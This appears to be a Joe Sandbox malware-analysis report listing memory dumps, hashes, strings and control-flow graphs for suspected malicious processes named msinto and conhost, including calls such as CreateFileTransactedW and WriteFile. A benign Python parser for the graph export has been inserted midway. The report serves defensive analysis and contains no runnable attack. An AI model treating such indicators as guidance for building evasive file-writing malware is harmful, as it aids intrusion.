                                                            • Opcode Fuzzy Hash: 103354322dddd460682f9f5e7577515848546292b5d036cab94208bd339dc20b
                                                            • Instruction Fuzzy Hash: D7719230608A4D8FDB69DF28C8957F937E1FB5A311F14422FE84EC7292CB7499458B81

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAy4
                                                            • API String ID: 0-3522526771
                                                            • Opcode ID: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction ID: a7948eb87be0f0529a7c3fba2485c21e84a37e0bc2bc83d6a211baf54d2857f8
                                                            • Opcode Fuzzy Hash: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction Fuzzy Hash: A8313821A0E6890FE7969B3888751E93FB0EF87310F0945F7D549C70E3D92CA90697A2
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e12258503fae9b1bb44f031767b4f47180ddcd71f4e858505015f75aab86b176
                                                            • Instruction ID: e98cb5305390b606c661ac40db9b0b4a454be4e98440665143f07e4671b34f4a
                                                            • Opcode Fuzzy Hash: e12258503fae9b1bb44f031767b4f47180ddcd71f4e858505015f75aab86b176
                                                            • Instruction Fuzzy Hash: 3C410322B0CA650FE754B7FCA0B92FAB791DF86325F0804BBD24DC7193DD68B8418284
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dafa30ee8224e5f4de06706f99636ddb9ae0f6039c83c9268fc3380252394cfa
                                                            • Instruction ID: 853425a6991960b4ec9a034298c254182bb5c168bf11c6e48dc894a75c03744c
                                                            • Opcode Fuzzy Hash: dafa30ee8224e5f4de06706f99636ddb9ae0f6039c83c9268fc3380252394cfa
                                                            • Instruction Fuzzy Hash: 3F41F422B0CA651FE764B7FC60AA6F9B7D5DF86321F08447BD14DC7193DD68B8418284
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: b95c0fddba714cae56ebba2eec607c2e8af1ad826bfc272167ce991942ba75b3
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 26210A3170DC184FE7A8EB0CE889DB973D1EF9A32170105BAE58EC7125E951EC8287C1
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction ID: c72533d5cb17247a87bb1c533d6d5b87f0d4f81b654bc3262004b07077e8c00b
                                                            • Opcode Fuzzy Hash: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction Fuzzy Hash: C3312020F0A91A4FEFD4EB2484A57B862D2FF5B700F5400B5D60ED7292DEACAC40A711
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10ad3d9aa56dd1a78469b084a337dccb68c5bf8590f568808efcc1c33430774a
                                                            • Instruction ID: 97bfa482e374b8a23f3a93eba17aedd33ce9833bda45c1aa327186a26c1c9158
                                                            • Opcode Fuzzy Hash: 10ad3d9aa56dd1a78469b084a337dccb68c5bf8590f568808efcc1c33430774a
                                                            • Instruction Fuzzy Hash: C831B431A0D64A8FDB85EB68C8A5AF977F0FF5A300F0545BAC009D7193DE79A841CB50
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56549c86fb1decb196d692c2c9fafa73a034b9a3e1d50eb89524c2d29af2bf4c
                                                            • Instruction ID: 45a6bd31bb409fe855f1759a9b5b4a8865b5c3c4f4ed2b9381a8e8e06b2d3e1a
                                                            • Opcode Fuzzy Hash: 56549c86fb1decb196d692c2c9fafa73a034b9a3e1d50eb89524c2d29af2bf4c
                                                            • Instruction Fuzzy Hash: 3D21FC20B199590FE7D8E76C54A96B9B6C2DB9A311F1000BDE50DC33D3DD6CAC418291
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction ID: fdab3cff6af208bbab6acc08e01a21042412c9e62ed33bb1b25778f1a9e79b67
                                                            • Opcode Fuzzy Hash: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction Fuzzy Hash: 75212936F0E6599FE712ABB898A10EC7B60EF43321F0441B3D248CB083E97C65469791
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 035cbd0902bfb01be1e36e6b0b41980d2e49b7714cd7a2026629ddaf6ef58949
                                                            • Instruction ID: 5ae8bdd446a85fe2189935f1c4cdaba0bb0ca342cf27c3d1c688d2c198bd0680
                                                            • Opcode Fuzzy Hash: 035cbd0902bfb01be1e36e6b0b41980d2e49b7714cd7a2026629ddaf6ef58949
                                                            • Instruction Fuzzy Hash: E4114235A09A09CFDBD4DB04C494BAD77F2EB59311F15416AD00EE7290CB79A9C1DF44
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction ID: d7e20ef46caded103447866c82c7d0a7a415cef8aa2d7700b4657cfbc0ef01d9
                                                            • Opcode Fuzzy Hash: f9eb178c4f6badb0614f9604599b8b76714e9d6950d87abe70f2f50f59437142
                                                            • Instruction Fuzzy Hash: F0110231F0E6899FE742DFA888A11EC7BB0EF43310F0440B2C244DB182E97C660A97A0
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction ID: 3c6f25c25252c45da23a75aba0579235deb93d5d0d959b0794446366e4bf13fb
                                                            • Opcode Fuzzy Hash: 35ebce3d15490930016013e936b75ba7b1a9d08090cbd0839bb9e25f21e05828
                                                            • Instruction Fuzzy Hash: 59110431F0E6899FE742DF6888A01DD7BB0EF43310F0440B6C144DB182D97C660A9790
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction ID: 3d479ace959c3510bd325deb31f905d4d0e3b3a52c4ddb87f263459dc55489e5
                                                            • Opcode Fuzzy Hash: feff8a622c2c9acc54c52f77033101e73e198fc650f9c086de1b1a29d46fbf84
                                                            • Instruction Fuzzy Hash: 08018F34E0E3899FEB52DFA888A01AD7FB0EF13310F1441F6D144DB182EA7C6A459791
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: 35ae8fa9d6c8ca725658f27ceb8a00f2924cf5f348593faf5c6130b85e78c64a
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 1AF0EC30A1A61E8EFF95EF40C8E47F87361FB96701F5401B5C60AD72A1DFAC69809A50
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 2c116b0a786b3751e807e9b052c8c1b01c4b9cef602d57735dfd3764030640b0
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: E6F05E30B0A60A4EFFD4EB00C8E46F82391FF57700F100175CA4ED72A2DEAC69409650
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                            • Instruction ID: 66c75b40299f0f4d489785dc1076b92980e8cdbe53304afc3d67fa0fc5274f24
                                                            • Opcode Fuzzy Hash: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                            • Instruction Fuzzy Hash: A0E04F51E4F78A06E6822ABD19F60AD6A541F93218F9C00B2D64DD6193B8CE30992677
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: 190f0a8a213a581b0c04eb4b02a759318e19f9084cd2505f1fee32b50ff71a4e
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: 81E01261F0E41646FBD4A754D4A07A96255DB49310F180078DB4ED33C1CD6CAD409B16
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction ID: 26a0e938c5b159bc7f38b261189ecc31e011f82e68bebc4e65eeb4eba0f1ebf6
                                                            • Opcode Fuzzy Hash: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction Fuzzy Hash: 44D05E34A249084BCB08EF39C88E535B3D1FB99206F99C1BA944ED66B0CF6998815741
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: 8acf1c5b332099b2246399b80d3ac6c9f554998e3a77f5c7c8a16b79e6bbc71c
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: C1D0A930629A4E8FDA40B738C89A8247BA0FF0F211FC914E1E008C71A2D60888A9C700
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 034f2f9127c1509428e41563de5c0a43d5071b4447ae523b29c7ff65ba71b807
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: C6C04C05F5B61F01B8957B6E58E60ACA1405BD7714FDD1172D74DD00D1ACCD20D92177
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: b000458af23801af5d7a1d6781a6c87292a975ce16cbf5cab5fe5ffb1a1b6739
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 95C08C305118098FC988EB28C88480433A0FB0A300BC10090E408C7170D25ADCC1D781
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03bc1bc54f1df904a32daa459cbe5720fadee2cf3ca2283467bbeadafdb049e8
                                                            • Instruction ID: 50f83a0cb2625f60f080dfceb6a9bc0e0b7bec0aff434059967039625f7f6b4d
                                                            • Opcode Fuzzy Hash: 03bc1bc54f1df904a32daa459cbe5720fadee2cf3ca2283467bbeadafdb049e8
                                                            • Instruction Fuzzy Hash: A8C08C00F0C82A82F2E5228400302BD04064F84301F484034E20DE73CACD6C2D0102C6
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: b227916acbea63441ba49516ee55eaf2e04fb610f2ad6c6872f37c3405b7b73b
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: F2B01200E6740F00A488377E08E206470405B47200FC810B0D70DC008198CD20982263
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 970184ef5f453681c824ba3ee8f1bfc658b3069047c65a3a19f2bf84c4be51f5
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 20C02B30F0E01C40E7A4473048510FA32014F43304F0D41F1810AF7082CC3C18003120
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2404883450.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_7ffd348a0000_msinto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction ID: 1aa783e87f7f83d51ef045af4f10062e2c7bb6e07b19927c41d851be2c32a240
                                                            • Opcode Fuzzy Hash: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction Fuzzy Hash: 54418F07B0956267E12137FD75711EEABA88F82379B0C5677E24CDA0C3ACB8748582E5

                                                            Execution Graph

                                                            Execution Coverage:4.9%
                                                            Dynamic/Decrypted Code Coverage:58.3%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:12
                                                            Total number of Limit Nodes:0
                                                            execution_graph (process 21, conhost; addresses match the functions of snapshot hcaresult_21_2_7ffd348e1000_conhost listed below; 12 nodes in four disconnected chains, one Win32 API call each, so the graph fixes which APIs are reached but not their relative order)
                                                            28949 7ffd348f3f02 -> 28950 7ffd34910400 GetFileAttributesW -> 28952 7ffd34910484
                                                            28953 7ffd348f3f32 -> 28955 7ffd348f7740 WriteFile -> 28956 7ffd348f7807
                                                            28957 7ffd348f3f52 -> 28959 7ffd348f7560 CreateFileTransactedW -> 28960 7ffd348f765a
                                                            28961 7ffd348f3f62 -> 28962 7ffd3490ef80 CloseHandle -> 28964 7ffd3490f004
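Joe Sandbox exports its execution and control-flow graphs to text as a flat token stream: a graph name, then node ids each followed by an address (or address range), optionally a `call <addr>` target or a Win32 API name, and `a->b` edge tokens mixed in. The following Python is an added example, not part of this report or of Joe Sandbox; it parses that stream into nodes and edges, extracts the API names, and follows the edges from each root. The two input strings are copies of the execution_graph of process 21 and of the control_flow_graph of function 7ffd348b0d4c from this report; they are embedded so the script runs offline.

```python
import re
from collections import OrderedDict

# Constructed sample: the execution_graph token stream of process 21 (conhost)
# copied from the text export of this report.
EXECUTION_GRAPH = (
    "execution_graph 28949 7ffd348f3f02 28950 7ffd34910400 GetFileAttributesW "
    "28949->28950 28952 7ffd34910484 28950->28952 28953 7ffd348f3f32 "
    "28955 7ffd348f7740 WriteFile 28953->28955 28956 7ffd348f7807 28955->28956 "
    "28957 7ffd348f3f52 28959 7ffd348f7560 CreateFileTransactedW 28957->28959 "
    "28960 7ffd348f765a 28959->28960 28961 7ffd348f3f62 28962 7ffd3490ef80 "
    "CloseHandle 28961->28962 28964 7ffd3490f004 28962->28964"
)

# Constructed sample: a control_flow_graph from the same report (function
# 7ffd348b0d4c). Same stream format, with address ranges and "call <addr>".
CONTROL_FLOW_GRAPH = (
    "control_flow_graph 180 7ffd348b0d4c-7ffd348b0d9b call 7ffd348b07f8 "
    "183 7ffd348b0da0-7ffd348b0eb9 180->183 198 7ffd348b0ebb-7ffd348b0efe 183->198 "
    "199 7ffd348b0eff-7ffd348b0f05 183->199 198->199 202 7ffd348b0f07-7ffd348b0f1d "
    "199->202 203 7ffd348b0f1e 199->203 202->203 205 7ffd348b0f1f-7ffd348b1050 "
    "202->205 203->205"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_NODE_ID = re.compile(r"^\d+$")


def parse_graph(stream):
    """Return (name, nodes, edges). nodes maps id -> label tokens (address or
    range first, then any API name / call target); edges is a list of
    (src, dst). Order of the original stream is preserved."""
    tokens = stream.split()
    name, tokens = tokens[0], tokens[1:]
    nodes, edges, current = OrderedDict(), [], None
    for tok in tokens:
        m = _EDGE.match(tok)
        if m:                                   # "a->b" edge token
            edges.append((int(m.group(1)), int(m.group(2))))
        elif _NODE_ID.match(tok):               # bare integer starts a node
            current = int(tok)
            nodes[current] = []
        else:                                   # address, "call", target, API
            if current is None:
                raise ValueError("label token before any node id: %r" % tok)
            nodes[current].append(tok)
    return name, nodes, edges


def api_calls(nodes):
    """API names attached to nodes, in stream order. The first label token is
    always the address; "call" and the token after it are a code call target,
    not an imported API, so both are skipped."""
    calls = []
    for label in nodes.values():
        for i, tok in enumerate(label):
            if i == 0 or tok == "call" or label[i - 1] == "call":
                continue
            calls.append(tok)
    return calls


def successors_of(edges):
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    return succ


def call_chains(nodes, edges):
    """Every path from a root (no incoming edge) to a sink, as label strings.
    A node is not revisited within one path, which cuts loops."""
    incoming = {dst for _, dst in edges}
    succ = successors_of(edges)
    chains = []

    def walk(node, path):
        path = path + [node]
        nxt = [n for n in succ.get(node, []) if n not in path]
        if not nxt:
            chains.append([" ".join(nodes[n]) for n in path])
        for n in nxt:
            walk(n, path)

    for root in nodes:
        if root not in incoming:
            walk(root, [])
    return chains


def render(stream):
    """Adjacency listing: one line per node with its label and successors."""
    name, nodes, edges = parse_graph(stream)
    succ = successors_of(edges)
    lines = ["%s: %d nodes, %d edges" % (name, len(nodes), len(edges))]
    for node, label in nodes.items():
        line = "  %d: %s" % (node, " ".join(label))
        if succ.get(node):
            line += "  -> " + ", ".join(str(s) for s in succ[node])
        lines.append(line)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(EXECUTION_GRAPH))
    print("APIs reached:", ", ".join(api_calls(parse_graph(EXECUTION_GRAPH)[1])))
    print(render(CONTROL_FLOW_GRAPH))
```

Run as a script it lists each node with its successors and then the four API names the execution graph reaches. Because the four chains share no edge, the parser (like the graph) cannot tell in which order the process called GetFileAttributesW, CreateFileTransactedW, WriteFile and CloseHandle; for ordering, use the report's API call log rather than this graph.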

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (entry block 7ffd348b0d4c, 7 basic blocks)
                                                            180: 7ffd348b0d4c-7ffd348b0d9b  call 7ffd348b07f8  -> 183
                                                            183: 7ffd348b0da0-7ffd348b0eb9  -> 198, 199
                                                            198: 7ffd348b0ebb-7ffd348b0efe  -> 199
                                                            199: 7ffd348b0eff-7ffd348b0f05  -> 202, 203
                                                            202: 7ffd348b0f07-7ffd348b0f1d  -> 203, 205
                                                            203: 7ffd348b0f1e  -> 205
                                                            205: 7ffd348b0f1f-7ffd348b1050
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: 7529edafed0f827b993f20a18f421fb04a4ce7587c916c3b90c40d3ea20d43ff
                                                            • Instruction ID: 245c50c916483be1676e9821d869d20ea2e1b30fc8c811ad94409379c090a68b
                                                            • Opcode Fuzzy Hash: 7529edafed0f827b993f20a18f421fb04a4ce7587c916c3b90c40d3ea20d43ff
                                                            • Instruction Fuzzy Hash: B591D275A1CAC98FE799DB6888B93A97FE1FF56314F0402BAC049D72D2CEB92411C740

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: CreateFileTransacted
                                                            • String ID:
                                                            • API String ID: 2149338676-0
                                                            • Opcode ID: ce8f065c2859d3bb0f7ae5ba2ad73d0c7ccb90faf35c2e8ed065488e24016afb
                                                            • Instruction ID: e5302bb1932c9469f15b9d5cc3b05e23bff4768bdb22b1ea525c6de72684fa2c
                                                            • Opcode Fuzzy Hash: ce8f065c2859d3bb0f7ae5ba2ad73d0c7ccb90faf35c2e8ed065488e24016afb
                                                            • Instruction Fuzzy Hash: C341707191CB5C8FDB58EF8CD845AA97BE0FB69721F10426EE449E3251DB70A8418B81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (entry block 7ffd348f3f32, 5 basic blocks)
                                                            101: 7ffd348f3f32-7ffd348f77b1  -> 105, 106
                                                            105: 7ffd348f77bb-7ffd348f7805  WriteFile  -> 107, 108
                                                            106: 7ffd348f77b3-7ffd348f77b8  -> 105
                                                            107: 7ffd348f7807  -> 108
                                                            108: 7ffd348f780d-7ffd348f7835
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 1b7503427d875259b39fc19176a02e784e0d308926743832ea38c9129587f24b
                                                            • Instruction ID: a985a22e76ff33361c319b8e08df66fb4d5f66b84032b923f30275932834b8bb
                                                            • Opcode Fuzzy Hash: 1b7503427d875259b39fc19176a02e784e0d308926743832ea38c9129587f24b
                                                            • Instruction Fuzzy Hash: 53319231A18A1C8FEB58DF99D8496F9B7E1FBA9311F00426ED04ED3251CB74A845CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (entry block 7ffd348f3f02, 3 basic blocks)
